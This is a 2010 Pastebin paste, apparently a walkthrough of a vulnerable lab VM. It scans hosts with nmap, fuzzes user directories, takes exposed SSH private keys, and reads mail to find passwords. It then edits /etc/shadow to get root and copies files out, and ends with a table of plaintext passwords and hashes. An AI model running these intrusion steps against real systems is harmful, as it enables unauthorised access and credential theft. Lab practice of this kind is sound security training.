API tools faq
paste
Advertisement
Guest User

g0tmi1k

a guest
Feb 12th, 2010
1,171
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.27 KB | None | 0 0
raw download clone embed print report
  1. nmap -n 192.168.2.1-255
  2.  
  3. nmap -n -sV -sS -O 192.168.2.100
  4.  
  5. nmap -n -sV -sS -O 192.168.2.101
  6.  
  7. firefox 192.168.2.100
  8.  
  9. [+]kate -> list of possible usernames. Save. Filename: usernames.txt
  10.  
  11. firefox 192.168.2.101
  12.  
  13. [+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin)  with '~' infront. -> http://192.168.2.101 -> 80
  14.  
  15.  
  16.  
  17. firefox 192.168.2.101/~pirrip
  18.  
  19. [+]kate -> Update usernames with the ones which we got a respond from. Save.
  20.  
  21. [+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2
  22.  
  23. ./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
  24.  
  25. firefox 192.168.2.101/~pirrip/.ssh
  26.  
  27. // Save both files
  28.  
  29. mv /root/id_rsa /root/.ssh/id_rsa
  30.  
  31. mv /root/id_rsa.pub /root/.ssh/id_rsa.pub
  32.  
  33. chmod 000 /root/.ssh/id_rsa
  34.  
  35. chmod 000 /root/.ssh/id_rsa.pub
  36.  
  37. ssh pirrip@192.168.2.100
  38. // Yes
  39.  
  40. mailx
  41. // 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'
  42.  
  43. cd /etc/
  44.  
  45. vi passwd
  46.  
  47. // kate -> Update usernames with only valid ones.
  48.  
  49. vi group
  50.  
  51. sudo vi shadow
  52. // edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
  53.  
  54. su
  55. // Password: 0l1v3rTw1st
  56.  
  57. cd /root/
  58.  
  59. ls -a
  60.  
  61. cd .save/
  62.  
  63. ls -a
  64.  
  65. chmod -R 777 /root/
  66.  
  67. //In BackTrack//
  68.  
  69. scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
  70.  
  71. unzip great_expectations.zip
  72.  
  73. tar xf great_expectations.tar
  74.  
  75. strings Jan08
  76.  
  77. //In SSH//
  78. sudo iv /var/mail/havisham
  79.  
  80. modprobe capability
  81.  
  82. //In BackTrack//
  83. ftp 192.168.2.100
  84. // Usrename: pirri. Password: 0l1v3rTw1st //
  85.  
  86. ls -a
  87.  
  88. //In SSH//
  89.  
  90. exit
  91.  
  92.  
  93. //In BackTrack//
  94.  
  95. [+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
  96. // GAME OVER
  97.  
  98.  
  99.  
  100. ----------------------------------------------------------------------------------------------------
  101. Users
  102. root:P1ckw1ckP@p3rs     root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
  103. havisham:changeme       havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
  104. pirrip:0l1v3rTw1st      pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
  105. magwitch:               magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
  106. ----------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!